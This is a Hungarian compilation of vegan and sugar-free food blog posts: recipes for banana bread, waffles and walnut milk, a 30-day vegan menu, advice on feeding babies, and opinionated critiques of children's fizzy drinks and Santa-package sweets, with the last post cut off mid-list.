Vegán bababarát mandulás banánkenyér Ez a banánkenyér az elmúlt hetekben többször elkészült nálunk. Kipróbáltam, teszteltem a receptet és jó. Egy tesztelés még hátra van, gluténmentes verzióban is szeretném elkészíteni. Ha elkészül, ez a bejegyzés fog frissülni a gluténmentes verzió leírásával. A héten, csütörtökön is nagy sikert aratott ez a banánkenyér a TV2 Babavilág című műsor dolgozóinak körében, ugyanis ezt készítettem el adásban (ami majd májusban kerül a képernyőre). A műsor miatt utána olvastam egy kicsit ennek a sütinek és kiderült, hogy az 1930-as években jelent meg először szakácskönyvekben az USA-ban és azért született meg, hogy a drágának számító, de már nagyon érett banánokat ne dobják ki a háziasszonyok, hanem egy ilyen “kenyérbe” sütve használják még fel. Ez csak a nevében kenyér, a valóságban sütemény, kiváló reggelire, nassolni vagy délutáni teázáshoz, kávézáshoz. Bababarát verzió (18 hónapos kortól ajánlott) is, ugyanis a három banánon kívül három evőkanál juharszirup van benne, ennyi az összes édesítés. Ezenkívül darált mandula, zabpehely “nehezíti” a tésztáját, valamint fahéj és vanília hozza ki belőle a maximumot. Szerintem vasárnap feltétlen süssétek meg! Még több banánkenyér: Vegán földimogyoróvajas Cukormentes datolyás olívaolajos Vegán mandulás csokoládés Diós csokoládés Vegán mandulás banánkenyér Hozzávalók: – 3 db érett banán – 1 és 1/­­4 bögre darált mandula (lehet darált törökmogyoróval, dióval is helyettesíteni) – 1 és 1/­­4 bögre zabpehely – 1 és 1/­­4 bögre tönköly fehérliszt – 3/­­4 bögre mandulatej (rizs-, zab-, szójatej is használható) – 3 evőkanál juharszirup – 3 evőkanál kókuszolaj, felolvasztva – 1 evőkanál chia- vagy lenmag – 3 evőkanál víz – 3 és 1/­­2 teáskanál foszfátmentes sütőpor – 1/­­2 teáskanál só – 1/­­2 teáskanál őrölt fahéj – 1 db vaníliarúd kikapart magjai Kétféleképpen tehetjük bele a banánokat. Vagy mindhárom banánt villával pépesre törjük és a tésztához adjuk, vagy csak kettőt törünk pépesre, a harmadikat pedig hosszában félbe vágjuk és a sütemény tetejére tesszük. Én mindkét változatot kipróbáltam. Ha mindhárom banán a tésztájába kerül, akkor picit édesebb lesz a sütemény. Tegyük egy tálba a pépesre tört két banánt. Öntsük hozzá a  mandulatejet, a kókuszolajat és juharszirupot. Adjuk hozzá a sót, f-a fahéjat, a vaníliát és jól keverjük el. Közben egy kis tálkában keverjük össze a chia magot a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra. Adjuk a zselés állagú chia magot a tésztához és jól keverjük el. Jöhet a liszt, a zabpehely és a darált mandula. Az összekevert tésztát öntsük egy 25 cm hosszú püspökkenyér formába, tegyük a tetejére a hosszában félbe vágott banánt és 180 fokon süssük 40-45 percig (végezzünk fogpiszkáló próbát, hogy jól átsült-e már a kenyér, akkor jó, ha a fogpiszkálóra már nem ragad semmi).

A 30 Napos Vegán Kihívás - 1. heti menü

2015. március 2. Vegagyerek 

1-7. NAPIG: Megfogalmaztad a legfőbb célod a Vegán Kihívással kapcsolatban?   Bevásárló-segédletet ITT találsz a menükhöz!Miből mennyit egyek, és a köztes étkezések témájához KLIKK IDE ! ÉS egy-két jó tanács:): - legyél rugalmas! Ha időbeosztásod éppen máshogy kéri, cserélgesd nyugodtan a napokat! Ha megmaradt étel, nyugodtan egyél, vigyél belőle másnapra is! - honnan tudsz mégis rendelni valamit, ha kifutsz az időből? : NYERSÉTEL AKADÉMIA Az ő ételeik maximálisan beleférnek a Kihívás koncepciójába, cukor, liszt- és mindenmentesek, és házhoz is szállítanak!   1. HETI MENÜ (1-7. NAP):1.   NAP Reggeli: Diós-erdei gyümölcsös zabkása Ebéd: rozmaringos főtt csicseri (főtt csicserire kis olívaolaj, citormlé, só, bors, és friss rozmaring, vagy zöldfűszerkeverék), valamilyen gabonával, pl. kuszkusszal és vegyes salátával Vacsora: brokkolis - vörös káposztás spagetti Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 2.   NAP   Reggeli: kiviszószos almatorony Ebéd: babkrémes-petrezselyempesztós tekercs Uzsonna-desszert: meggyes banánfagyi Vacsora: barna rizsgolyók bazsalikomos kesuszósszal  Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 3. NAP Reggeli: diós-banános hajdinamuffin gabonakávés-natúr szójatejes cappuccinoval Ebéd: csicserikrémes padlizsán-lasagne Uzsonna-desszert: nyers avokádós csokipuding Vacsora:  tökmagpástétom friss zöldség szeletekkel, csíkokkal/­­ teljes kiőrlésű pirítóssal Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 4. NAP Reggeli: Málnás-amarántos szójajoghurt pirított kókusszal (bármilyen szezongyümölccsel készítheted!) Ebéd: a paradicsomos-gombás polenta előző napról, akár friss salátával kiegészítve Vacsora: csicsókás babfasírt előző napról friss salátával, vagy nyers zöldségszeletekkel Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 5.   NAP Reggeli: napraforgós-mandarinos reggeli kása Ebéd: paradicsomos szendvics: 2 szelet pirított barna kenyér közé tegyél felszeletelt paradicsomkarikákat, egész bazsalikom leveleket, zöld leveles salátát, csírákat és megkenheted akár tojásmentes kölesmajonézzel is. http:/­­/­­www.vegagyerek.hu/­­2011/­­01/­­tofusalatas-szendvicskrem-es.html Ha gazdagabban szeretnéd megpakolni, akkor egy-két szelet füstölt tofut piríts meg kis olajon, vagy grillezd meg,  pici szójaszósszal ízesítve, és azt is tedd a kenyérbe húspótlóként. Vacsora: tepsiben sült zöldségek: különféle zöldségek, amiket találsz a hűtőben, felaprítva (szezonálisak mehetnek bele nyugodtan, sütőtök, cékla, káposztafélék, répa, stb., figyelj rá, hogy nagy kockákra vágd, ne süljön szét!:-) meglocsolva kis olívaolajjal, hozzá só-bors, és süsd meg a sütőben! Salátát nyugodtan ehetsz hozzá, vagy ha nagyon éhes vagy, valamilyen gabonát is főzhetsz hozzá (rizs, quinoa stb.)! Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 6. NAP Reggeli: aszalt sárgabarackos quinoa-amaránt müzli Ebéd: spenótos rizottó Vacsora: édesburgonyás sárgarépakrémleves diós petrezselyempesztóval , 1-2 szelet pirított barna kenyérrel) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 7. NAP Reggeli:1-2 szelet pirított teljes kiőrlésű kenyér valamilyen olajos mag krémmel (pl. mandula, kesudió, szezám), és esetleg cukormentes lekvárral (pl. bio cukormentes szilvalekvár, vagy bio agave sziruppal édesített gyümölcslekvár); friss gyümölcs (ezt áttolhatod uzsonnára is) Ebéd: leves előző napról + csicsókás babfasírt vegyes zöldsalátával Vacsora: paradicsomos-gombás polenta (a receptben a paradicsomot rizs/­­ agave sziruppal édesítsd a nyírfacukor helyett!) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint  

Babakonyha. 1.rész. A szülő felelőssége

2015. március 1. Éltető ételek 

Babakonyha. 1.rész. A szülő felelősségeMiért gondoljuk azt, hogy egy baba táplálásának másképp kell történnie, mint egy felnőtt ember egészséges táplálkozásának. Ezen azt értem, hogy vannak olyan alapelvek, amelyeket minden esetben be kell tartani, függetlenül attól, hogy az a baba étele, vagy éppen egy felnőtté.  Most nézzük meg, hogy mire figyeljünk oda, amikor ételt vagy italt adunk a gyerekünknek.  A szülő felelőssége, hogy mit eszik a gyerek  Az, hogy mit eszik egy gyerek, az a szülő felelőssége (döntése). Nem a szomszédé, nem az anyósé és nem is a védőnőé! Persze lehet tanácsot kérni, sőt kell is. Ma már nagyon sok információhoz hozzá tudunk jutni, nem úgy, mint mondjuk 12 éve, amikor csak a védőnőnek és a nagymamának hihettünk. Nekem a nagylányom 13 éves lesz, bizony születése után mit nem adtam volna, ha a kezembe foghatok egy egészséges babatáplálós könyvet.  Nem mertem főzni, egyszerűbb volt megvenni a bébiételeket, persze a védőnő is ezt tanácsolta. Meg azt gondoltam, hogy egy bébiételnek különlegesnek kell lennie, hiszen mégiscsak egy bébiétel, pedig ezek elkészítése a legegyszerűbb. A második és a harmadik lányomnál már más volt a helyzet. Rájöttem, hogy nem kell túlkomplikálni a dolgokat. Mindennap főztem nekik ebédet, és friss gyümölcsöket, zöldségeket kaptak.  Vannak kutatások, pro és kontra vélemények - mint pl. a glutén bevezetése -, de szerintem nagy hibát nem tudunk elkövetni, ha teljes értékű ételeket adunk a babánknak. Ők még elég okosak ahhoz, hogy ÖSZTÖNÖSEN tudják, mi a jó nekik.  Ne gondoljuk azt, hogy ha készítünk egy banános-zabos kekszet, az a babának nem fog ízleni, mert nekünk se ízlik. A babának még nincs kialakulva az ízérzéke, neki nem kell sózni, édesíteni, fűszerezni az ételeit. A mi ízlésünk már kialakult, a babáé még csak most fog, és rajtad múlik, hogy ez milyen lesz. Hidd el, szívesen fogja enni az ilyen egyszerű ételeket is.  De ha a szülő elrontja, na, akkor van a baj. Ordít a gyerek? Veszek neki a közeli látványpékségből valami "finomságot". Legközelebb, ha arra járunk, már az illatot érezve ordítani fog, hogy az bizony kell neki. Ez nem más, mint egy függőség kialakulása . Ezekben a félkész ételekben olyan adalékanyagok, illatanyagok vannak, amelyekre azon nyomban beindul a pavlovi reflex, és bizony a gyerek követelni fogja magának. És mit tesz egy anyuka, aki nem akar hisztit? Megveszi neki!  Az élelmiszeripar manipulálja a gyerekek, majd ezáltal a felnőttek ízlését . Garantálja a piacot még 50 év múlva is. Mit szeret a gyerek? Legyen édes, tetszetős csomagolású... ennyi. Miért van az, hogy a gyerek az eperjoghurtot szereti, maga az eper meg nem ízlik neki? Hát azért, mert elsőként az eperjoghurttal találkozott. Ehhez viszonyít. Az édes, mű ízhez! Nem ismerik a természetes ízeket! Mi, szülők vagyunk az oka annak, hogy a gyerek válogatós! Nem hagyjuk az ösztöneiket szabadon érvényesülni. Legyen megfelelő kínálat az asztalon, változatosan. Ismerjen meg minél több zöldséget, gyümölcsöt, gabonákat. Ekkor még nincs előítélet, hogy pfújjj brokkoli, ekkor még simán megkóstolja és eldönti, hogy kell-e neki. A későbbiekben ismertetett BLW módszernek is részben ez a lényege.  Persze lehetnek egyéb egészségügyi okok, ami miatt válogatós. Ilyen pl. az ételintolerancia, amikor a gyerek ösztönösen tudná, hogy az nem jó neki, de a szülő meg nem tud vagy nem akar mást adni! Pedig lehetne!!!  Egy gyereket, amíg nem kerül közösségbe, csak a szülő (nagyszülő) tudja elrontani! Sokszor látom, hogy az óvodába kinder tejszelettel érkezik a gyerek, és arra panaszkodik a szülő, hogy a gyereke nem hajlandó mást enni. Hát, hülye is lenne - már bocsánat a kifejezésért -, ha ezt megkapja, miért is enne mást? 

Vegán banános mandulavajas gofri

2015. február 27. Zizi kalandjai 

Vegán banános mandulavajas gofri Új családtagunk van… egy gofrisütővel bővültünk! Már nagyon rég szerettem volna egyet és néhány hete valóra váltottuk ezt az álmom. Ráadásul ilyen virág formájút vettünk, ami öt szívecskéből áll össze valójában. Így is esszük a gofrit, széttépkedjük szívecskékre, megkenjük mandulavajjal és almakockákat rakunk rá. A képen látható kis tálka juharszirup csak eszköz volt a képhez, természetesen most a cukormentes hónapban nem eszünk ilyet sem. Egyébként a banánnak köszönhetően kellemesen édes a gofri, nekünk így is jó. A gofriról egyetlen fotó készült, minimál stylinggal, mert ugye éhes apa, éhes Ádi és éhes anya is reggel, szóval nincs idő gofrisütés közben percekig állítgatni a fényképezni kívánt ételt, na és persze fotózni. Mostanában amúgy is a minimál dizájn jellemző a blogomra. Egy rohangáló 22 hónapos mellett nincs lehetőségem annyi időt fordítani a stylingra, mint korábban. Igazából lassan abba a korba kerül, hogy előléptetem fotós és styling asszisztensnek, úgyis annyit sürög-forog a konyhában és a fotózások alkalmával ő maga is próbálkozik, szóval megérdemli az előléptetést. Szerintem! Akinek van gofrisütője, hétvégén feltétlen próbálja ki a receptet! Akinek pedig tuti vegán gofri receptje van, az ne habozzon megosztani velem kommentben! Vegán banános mandulavajas gofri Hozzávalók kb. 5-6 db-hoz: – 1 db érett banán, villával pépesre törve – 2 teáskanál mandulavaj (földimogyoróvaj, kesudióvaj is használható) – 2 teáskanál frissen facsart citromlé – 1 teáskanál fahéj – 1 teáskanál chia mag – 1/­­4 teáskanál só – 1 és 1/­­2 bögre mandulatej (rizstej és zabtej is használható) – 1 bögre és 4 teáskanál tönköly fehérliszt – kókuszzsír, sütéshez Egy tálban törjük pépesre a felszeletelt banánt. Adjuk hozzá a citromlevet, mandulavajat, chia magot, fahéjat, sót és keverjük el. Öntsük hozzá a mandulatej felét, majd lassan kezdjük el adagolni hozzá a lisztet. A végén öntsük hozzá a maradék mandulatejet és keverjük simára. Melegítsük fel a gofrisütőt, kenjük be kókuszzsírral és süssük ki a gofrikat. Ha tányérra tesszük gyorsan megpuhulnak, ha rácson hagyjuk kihűlni, akkor tovább maradnak ropogósak, de egy idő után így is megpuhulnak. Én mindkét változatot szeretem.

Házi diótej + fűszeres banán smoothie

2015. február 10. Zizi kalandjai 

Házi diótej + fűszeres banán smoothie Éltemben először csináltam diótejet és a végeredmény egy krémes, már-már zsírosnak tűnő, dió ízű növényi tej, amely magában is finom. Mi egyből megittuk turmixként, de a képzeletemben egy habos diótejes kávé még azért piszkálja a fantáziámat, szóval lesz még diótej készítés a konyhámban. Végtelenül egyszerű, nincs szükség tejkészítő gépre, csak egy kis áztatás előzi meg a turmixolást és szűrést, szóval bárki el tudja készíteni, akinek van turmixgépe. A tej receptje – ez nem is igazán recept – ebből a könyvből származik, a banános turmixos változathoz pedig innen vettem az inspirációt. Többen kérdeztétek, hogy van-e februárban cukormentes kihívás? Nos az idén nem hirdettem meg, de mi azért tartunk magunknak. Az az igazság, hogy alig eszünk édeset, cukrosat, mert ugye Ádinak se adunk, így mi magunk sem eszünk ilyen dolgokat, tehát egészségesen és majdnem cukormentesen élünk amúgy is! Nem eszünk sütiket cukrászdákban, elég keveset is sütök, ha valamit mégis, akkor azt juharsziruppal, esetleg mézzel és banánnal édesítem. Leginkább az esti 70-80%-os csokikockáinkról kell lemondanunk, ez az egyedüli “bűnözés” napjainkban. Mivel ez az egyetlen édes(kés) dolog, ezért talán most még nehezebb megállni, hogy ne együnk édeset, mint a korábbi években, amikor sokkal több édességet, desszertet ettünk. De ki fogjuk bírni csokikockák nélkül, érzem! Házi diótej Hozzávalók: Tejhez (3 bögrényi, kb. 750 ml lesz belőle): – 1 bögre dió – 3 bögre tisztított víz Fűszeres banános smoothie: – 1 és 1/­­2 banán (kettőtől túl banán ízű lesz és elveszik a tej dió íze) – 3 bögre diótej – 1 vaníliarúd kikapart magjai – 1 teáskanál őrölt fahéj – 1 teáskanál kakaópor vagy karobpor (opcionális, kellemes csokis ízt ad a smoothie-nak, érdemes beletenni, akár többet is) – 1 evőkanál juharszirup (opcionális, mi kihagytuk) – csipet őrölt szerecsendió – chia mag (tálaláshoz) (A recepthez használt bögre 250 ml-es.) Tegyük egy tálkába a diót és öntsük fel annyi vízzel, amennyi bőven ellepi. Hagyjuk állni egy éjszakán át. Másnap reggel a beáztatott diót szűrjük le és tegyük a robotgépbe, öntsük fel a három bögre tisztított vízzel és dolgoztassuk a robotgépet addig, amíg a diót teljesen pépesre aprítja és kapunk egy sűrű folyadékot. Gézen vagy apró lyukú szűrőn öntsük át és az így kapott diótejet töltsük üvegbe. Fogyasszuk azonnal. Hűtőben tartva egy-két napig eláll. A gézen, szitán megmaradt dió darálékot mi hűtőbe tettük és másnap a reggeli zabkásánkhoz adtuk. A smoothie-hoz tegyük az összes hozzávalót a robotgépbe és turmixoljuk simára. Töltsük poharakba és azonnal fogyasszuk. Én szórtam chia magot a tetejére, de tálalhatjuk pirított dióval megszórva, és banánkarikával tálalva.

Saláta az üvegben

2015. január 16. Gréta konyhája 

Saláta az üvegben Bizony, ha tudatosan szeretnénk táplálkozni, sokszor nagy fejtörét okoz, hogyan, vagy hol együnk adalékmentes, tejtermékmentes, húsmentes friss salátát, ami finom is. Ezért a legjobb, ha mi magunk készítjük el otthon, így garantáltak az összetevők. A befőttesüvegekbe előre elkészített salátaebéd, vagy vacsora, korántsem újdonság, mégis szeretném nektek feleleveníteni, hogy még ennyi kifogásunk se lehessen, miért nem tudunk rendesen ebédelni a munka helyünkön. Ez a megoldás annyira egyszerű, és praktikus, hogy érdemes kipróbálni, mindössze a kedvenc öntetünkre lesz szükségünk, íme az enyém: http:/­­/­­gretakonyhaja.postr.hu/­­egeszseges-inyenc-salataontet Beleöntjük a dresszinget, lezárjuk, és jól összerázzuk, majd az üvegből közvetlenül villával, vagy evőpálcikával fogyaszthatjuk. Adhatunk hozzá mindenféle salátát, zöldséget, gyümölcsöt, magvakat, csírákat! Nyers, vegán és cukormentes.

Répa-kókusz tejshake

2015. január 7. Gréta konyhája 

Répa-kókusz tejshakeBizonyára sokan kezdtek bele az újévben különdéle tisztítókúrákba, egyéb fogadalmakba. A január eleje kifejezetten alkalmas erre, legyen az egészségesebb életmódra törékvés, cukormentesség,  húsmentesség, tudatosabb táplálkozás, nyersétkezés, vagy bármi, amely segít visszaállítani, vagy megtalálni végre testi-lelki-szellemi harmóniánkat. Azon túl, hogy a blogomban lévő receptek egyike sem tartalmaz állati eredetű összetevőt( hús, tej és származékai, tojás, méz), mindig figyelek arra, hogy lehetőleg gluténmentes legyen, megfelelő ételpárosítással járjon, egészséges legyen, és ami a legfontosabb, nagyon finom. Ezért is ajánlok most gyorséttermi kedvelt shake-ek helyettesítésére, egy otthon, könnyedén elkészíthető mennyei finomságot, amelyet leginkább délutáni édességre vágyakozás kielégítésére tudok elképzelni, és ami a legjobb, hogy melegen, vagy hidegen egyaránt finom, pénztárcabarát megoldás, amitől garantáltan nem lesz bűntudatunk. A gyorséttermi shake-ekkel ellentétben, az otthon elkészíthető répashake szezonális, nem tartalmaz tejterméket (hormonok, antibiotikum, vér, genny), cukrot, mesterséges adalékanyagokat, szilikonszármazékokat és egyéb mű-anyagot. Mindössze 5 hozzávalóból, egy turmixgép segítségével elkészíthető ez a habos-fűszeres finomság. Hozzávalók: 2 közepes méretű répa meghámozva, megmosva 2-3 dl mandulatej 1 dl kókuszkrém stévia cseppek ízlés szerint mézeskalács fűszerkeverék (fahéj, szegfűszeg, gyömbér, kardamom, szerecsendió) Hideg változat: A répákat 2-3 nagyobb darabra végjuk, majd megfőzzük, ha kihűlt pár órára fagyasztóba tesszük. A fagyott répahasábokat egy turmixgépbe tesszük a többi hozzávalóval, majd kb egy percen keresztül turmixoljuk. Kiöntjük egy nagyobb pohárba, tetejére tehetünk még kókusztejszínhabot, megszórhatjuk fahéjjal. Meleg változat. A répákat megfőzzük, vagy egy tepsiben, sütőben megsütjük, és a fentebb leírtakhoz hasonlóan járunk el, azzal a különbséggel, hogy forráspontig melegített mandulatejet adunk hozzá. Jó étvágyat!

Kölyökpezsgő? Inkább NE! Készíts egészséges "pezsgőt" gyerekeidnek

2014. december 19. Éltető ételek 

Kölyökpezsgő? Inkább NE! Készíts egészséges Újabb bizonyítéka annak, hogy a gyártók hány "bőrt képesek lehúzni" a tudatlan emberekről. Megnézted valaha is, hogy mit tartalmaznak ezek a szénsavas italok? Nos, én igen. Ezek a kölyökpezsgők alapból szénsavas vizet, cukrot és egy csekély gyümölcslevet tartalmaznak. És mindezeket 300-500 ft-ért adják attól függően, hogy milyen kép díszeleg rajta. Egy pókemberes, vagy egy hamupipőkés bizony drágábban "van mérve". Nézzük meg, hogy pontosan mit takarnak ezek a díszes üvegek (0,75 l): Törley Kft. gyártósoráról kerültek ki ezek a kölyökpezsgők. Többféle ízben van, mint pl. szamóca, meggy, alma, barack, szőlő. Összetevők: víz, szamócalé 12%, cukor, szén-dioxid, étkezési sav (citromsav), tartósítószer (kálium-szorbát), antioxidáns (aszkobinsav), aroma, színezék (E163) Erre vágytál? Szerintetek mit hasznosít ezekből a szervezet? Hát, sok jót biztos nem!!! Ez az alapanyag vajon mennyibe kerülhet a gyártónak?? Hát, jól meggazdagodik ebben a fogyasztói társadalomban! Nézzük a Vitapress Kft.  termékeit, melyek az egész palackot beborító zsugorfóliába csomagolt gyerekpezsgők. Ezek egyrészt Disney és Warner képek (Batman, Hercegnők, Micky egér, Csingiling), de vannak saját grafikával ellátott termékek is, mint pl. dínós, mikulás, zoo partis is. Batman alkoholmentes üdítőital összetétele: Összetevők: ásványvíz, eperlé (sűrítményből, 12% m/­­m), cukor, szén-dioxid, étkezési sav (citromsav), arónialé, természetes aroma, C-vitamin, tartósítószer (K-szorbát), C-vitamin tartalom: 20 mg/­­100 ml (a napi ajánlott bevitel, RDA 33%-a) Na most biztos több szülő megörült, "DE JÓ, még C-vitamint is tartalmaz!!" Micsoda üzleti fogás! Csak sajnos ez szintetikus C-vitamin, ami nem a legjobb egy fejlődő szervezetnek. Hát, itt sem az alapanyag kerül mintegy 600 ft-ba, hanem a Disney licensz. Találkozhatunk még a piacon a Tini gyerekpezsgőkkel is, melyeket a Szikravin Borászati Kft. gyártja. Ők gyártják a híres Piroska szörpöket is. Ezek összetevője is sok "csemegét" tartalmaznak: Nézzük: Összetevők: víz, Fuktóz-glükóz szirup, málnalé (10% V/­­V) (sűrítményből visszahígítva), szén-dioxid (min. 5 g/­­l), étkezési sav (citromsav), színező anyagok (szőlőhéj kivonat, bodza kivonat), aroma, tartósítószerek (kálium-szorbát, nátrium-benzoát) Ezek még valódi gyümölcslevet sem tartalmaznak, csupán sűrítményből vannak visszahígítva. Nos, inkább ajánlok egy jóval olcsóbb, és egészségesebb verziót, hogy legyen mivel koccintani a gyerekeinkkel szilveszter éjjelén! Egészséges kölyökpezsgő házilag: Hozzávalók: - 1 liter szénsavas ásványvíz (oldott ásványi anyag tartalom 500 mg-nál ne legyen több) - 1-2 dl cukormentes málna szörp Szerintetek kell még valami bele? Szerintem nem. Buborékos, gyümölcsös... és finom. Egészségedre!

A nyers vegán Sületlenségek már a RépaKonyha webshopban is

2014. december 2. Répa Konyha 

A nyers vegán Sületlenségek már a RépaKonyha webshopban is Az ÉletKonyha nyers vegán, gluténmentes, cukormentes termékeit, aSületlenségeket már a RépaKonyha webáruházon keresztül is megrendelhetitek! Váljanak egészségetekre!

Egészségre ártalmas mikuláscsomagok, avagy a 10 legveszélyesebb élelmiszer, ami a csomagokba kerülhet

2014. november 27. Éltető ételek 

Van zsákodban minden jó, piros alma, mogyoró...  Biztos mindenki ismeri ezt a kedves kis dalt. December 6-át megelőző este gyerekek milliói tisztogatják csizmájukat abban a reményben, hogy finomabbnál finomabb meglepetést kapjanak. Na de mi kerüljön a mikuláscsomagba? Jobban mondva, mi ne kerüljön? Összegyűjtöm azt a 10 immunromboló, egészségre ártalmas ajándékot, ami biztos nem kerül bele a gyerekeim csizmájába. Persze lehetne még sorolni, és nem megállni a tíznél, de remélem, hogy amennyiben elolvasod ezt a blogot, akkor látni fogod az alapelveket. Előljáróban minden olyan édesség kizárva, amelynek a fő összetevője cukor. Ezenkívül a hidrogénezett növényi zsiradék is kizárt, valamint az E-számokkal tűzdelt leírás. Azokat veszem sorba, amik mindig bekerülnek a gyerekeim óvodás csomagjaiba. Sajnos ezek a többnyire a kukában landolnak, miután a gyerekekkel közösen áttanulmányoztuk az összetevőket. Még a szegény gyerekeknek sem szívesen adom oda, hiszen ha az én gyerekeim egészségét károsítja, akkor a szegény gyerekekét is. Én meg azt nem szeretném... Valamint a mértéktelen csokoládé- és cukorfogyasztástól a gyerekek túlpörögnek és székrekedést kaphatnak, ezért is érdemes legalább a Mikulás-csomag egy részét az édességeknél tápanyagban gazdagabb élelmiszerekkel kiváltani. 1.  Csokimikulások Nem minden csoki, ami annak látszik. Nézzük meg a mikulások talpára ragasztott leírást, amely alapján könnyűszerrel megállapíthatjuk, hogy a kosarunkba kerüljön-e vagy sem. Elsősorban azokra a csokoládékra gondolok, amelyeknek a kakaós tejbevonó massza, a hidrogénezett növényi zsíradék valamint a cukor a fő összetevője. Ugyanakkor ne dőljünk be a méretüknek sem, hatalmas csokimikulások kaphatók pár száz forintért. Nos, ezek biztos, hogy nem a gyerekek csomagjába valók! Sőt, még fokozzák mindezeket azzal, hogy a mikulás üregébe helyeznek különféle cukros drazsékat, pelyheket . Viszont nehogy úgy járjatok, mint ahogy a mellékelt képen látható. Mikulás csomagolásba húsvéti nyuszi volt. Úgy látszik, kimaradtak a tavaszi nyuszik, és azt becsomagolták karácsonyra. No comment...  Törekedjünk arra, hogy étcsokit válasszunk, kapható olyan csokoládé is, melyek 60-70% kakaóvaj tartalommal rendelkeznek. Mindenesetre az első helyen a kakaóvaj álljon, akkor nagy hibát nem követünk el. 2. Szaloncukor Itt is találunk jó és kevésbé jó, valamint kifejezetten ártalmas szaloncukrokat. Zselés, marcipános eleve kizárva. Csak példaként kiragadva, ez egy magyar, nagyhírű csokoládégyár zselés szaloncukor jának az összetevője: "cukor, glükóz szirup, kakaós étbevonó massza 20% [cukor, növényi zsír, zsírszegény kakaópor (10%), emulgeálószer (szójalecitin), aromák (csokoládé- vanília)], étkezési sav (citromsav), zselésítő anyag (pektin), aromák (citrom, málna), színezék (E120)" Valamint ne dőljünk be az ÍZŰ elnevezéseknek sem, mert ezek egyáltalán nem tartalmazzák a valódi gyümölcsöt, csupán azok aromáját. Erre is egy példát hozok. Császárkörte ízű szaloncukor narancshéjdarabokkal : Fondan (cukor, glükóz szirup, víz), kakaós étbevonó massza (cukor, növényi zsír, zsírszegény kakaópor (16% emulgeálószer (szójalecitin), természetazonos aromák (csokoládé- vanília ízű), tejfehérje, hidrogénezett növényi zsír, szójaliszt, narancshéjdarabok, zsírszegény kakaópor, nedvesítőszer (szorbit), természetazonos aromák (császárkörte, narancsolaj aroma), étkezési sav (citromsav), emulgeálószer (szójalecitin), tartósítószer (kálium- szorbát), étkezési só, stabilizátor (invertáz) Na, ez hogy tetszik?  Törekedjünk aszalt gyümölcsös, valódi kakaóvajas szaloncukrot vásárolni. Kaphatók kézműves szaloncukrok, de ebben az esetben is nézzük meg az összetevőket! 3. Gumicukor  A fő összetevője állati eredetű zselatin, ami főleg a kötőszövetből készült. Ezenkívül rengeteg adalékanyagot tartalmaz, hiszen a színezéshez, az ízesítéshez, és a tartósításhoz is szintetikus szereket használnak fel, tehát a gumicukor valójában műanyag, ami egyáltalán nem egészséges. 4. Cukorkák  Szerintem ez egyértelmű, de ne gondoljuk azt, hogyha vitaminnal dúsított, akkor milyen szuper. Nos, NEM. Sajnos ezek szintetikus vitaminok, melyek fokozzák a cukor káros hatásait. Egyébként minden anyukának, nagymamának, óvonőnek, tanárnőnek, élelmezésvezetőnek kötelezővé tenném a Cukor blues című könyv elolvasását! 5. Kinder tejszelet  Nos, itt is van 1-2 varázsszó. Egyrész a kinder ugye gyereket jelent, tehát kifejezetten nekik készítette a gyártó. Valamint a méz és a tej is egy fontos varázsszó. Hű de jó, akkor ez egészséges. Nos, NEM. Valójában 57%-ban zsírból és cukorból áll. Pontos összetevője: pasztőrözött tej 40%, növényi zsír és olaj, cukor, búzaliszt, sovány tejpor, méz 5%, dehidratált vaj, tojáspor, sovány kakaópor, finom korpa, térfogatnövelő szerek (dinátrium-difoszfát, nátrium-hidrogén-karbonát, ammónium-karbonát), emulgeálószer (zsírsavak mono- és digliceridjei), aromák, étkezési só.  Ha figyelmesen megnézzük, csupán 5 % mézet tartalmaz, ugyanakkor sokkal-sokkal több cukrot. Egy tejszelet nettó tömege 28 gramm, amelyben 2,5 kockacukornak megfelelő cukor található. 6. Kinder csokoládé Mit mond a gyártó? Több tej, kevesebb kakaó: az egyenként csomagolt tejes töltésű tejcsokoládé szeletek a gyerekek igényeinek figyelembevételével készülnek, kifejezetten gyerekméretben. Na de nézzük meg az összetevőjét is: tejcsokoládé 40% (cukor, teljes tejpor, kakaóvaj, kakaómassza, emulgeálószer: lecitinek (szója); vanillin), cukor, sovány tejpor (18%), pálmaolaj*, dehidratált vaj, emulgeálószer: lecitinek (szója); vanillin. Kakaószárazanyag-tartalom a tejcsokoládéban: legalább 30%. Összes tejszárazanyag: 33% - Összes kakaó összetevő: 13%  Mielőtt még bármit is írnék, azt tudni kell, hogy mit tartalmaz egy jó csokoládé: kakaóvaj, kakaópor, természetes édesítő, pl. nádcukor). Mivel ez tejes, így tejport is tartalmaz. Szerintem az összetevőket megvizsgálva, mindenki döntse el maga, hogy bekerül-e a mikuláscsomagba ez a desszert. 7. Maoam Nos, én ezt még sosem kóstoltam, de a pénztárnál várakozva a gyerekek mindig ezzel nyaggatnak. Mindenesetre a csomagolás szuperül a gyümölcsökre épít (többek között cseresznyés epres, málnás, savanyú almás, lime, cólás ízben kaphatók), mintha telis tele lenne értékes, természetes vitaminokkal. A neten böngészve jövök rá, hogy ez nem más, mint olvadós rágó. És még dobozos kiszerelésben is kapható. Hűűű. Pontos összetevőt nem találtam, viszont a tápérték vizsgálata alapján 57%-a cukor! Ne haragudjatok, de ez KUKA!!!! 8. Nyalóka  Hát, ez a halálom. Jó sokáig áznak azok a drága tejfogacskák a cukorszirupban, nincs ennél rosszabb. Biztos többen emlékeztek Kojak-re, a híres nyomozóra. Mindig a szájában lógott ez a cukorka. Bár kézműves nyalókák is kaphatók, de minden esetben a fő összetevője a cukor. Ezt találtam egy blog oldalán: Szörpös nyalóka hozzávalói: 1 pohár cukor (1,5 decis), fél pohár víz, negyed pohár (kb. 2 evőkanál) glükózszirup, 1 evőkanál sűrű szörp vagy 2 evőkanál rostos gyümölcslé. Nos, ha ilyen receptek vannak az oldalán, akkor gondolom, a vásárolható nyalókái is hasonló alapanyagokból készülnek. 9. Cukormentes rágóka  Ezt olvasva, biztos sokan 